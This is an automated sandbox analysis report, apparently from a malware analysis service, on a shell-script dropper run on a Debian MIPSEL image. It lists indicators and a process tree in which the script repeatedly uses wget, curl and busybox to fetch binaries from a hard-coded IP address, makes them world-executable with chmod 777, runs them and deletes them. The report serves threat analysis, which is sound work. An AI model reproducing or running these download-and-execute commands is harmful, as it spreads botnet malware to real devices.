Analysis
-
max time kernel
138s -
max time network
143s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
-
Size
10KB
-
MD5
60c5521dc77c48a75842ba0dbc3fae7c
-
SHA1
9ddfd137b35be8207eb3889a9a93c23ce142e184
-
SHA256
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
-
SHA512
da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
-
SSDEEP
192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 751 chmod 815 chmod 877 chmod 919 chmod 889 chmod 925 chmod 967 chmod 973 chmod 901 chmod 931 chmod 767 chmod 871 chmod 883 chmod 943 chmod 979 chmod 937 chmod 949 chmod 955 chmod 792 chmod 823 chmod 829 chmod 907 chmod 737 chmod 745 chmod 847 chmod 895 chmod 913 chmod 961 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 739 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 746 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 752 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 768 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 793 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 816 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 824 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 830 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 848 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 872 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 878 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 884 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 890 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 896 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 902 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 908 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 914 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 920 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 926 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 932 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU 938 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo 944 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD 950 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 956 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 962 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ 968 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH 974 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R 980 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R curl File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD curl File opened for modification /tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ curl File opened for modification /tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl File opened for modification /tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo curl
Processes
-
/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:736
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:741
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:744
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:750
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:764
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:774
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:775
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:787
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:812
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:822
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:828
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:844
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:865
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:876
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:882
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:888
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:894
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:900
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:906
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:912
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:918
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:924
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:930
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:936
-
-
/bin/chmodchmod 777 s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU./s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵
- Executes dropped EXE
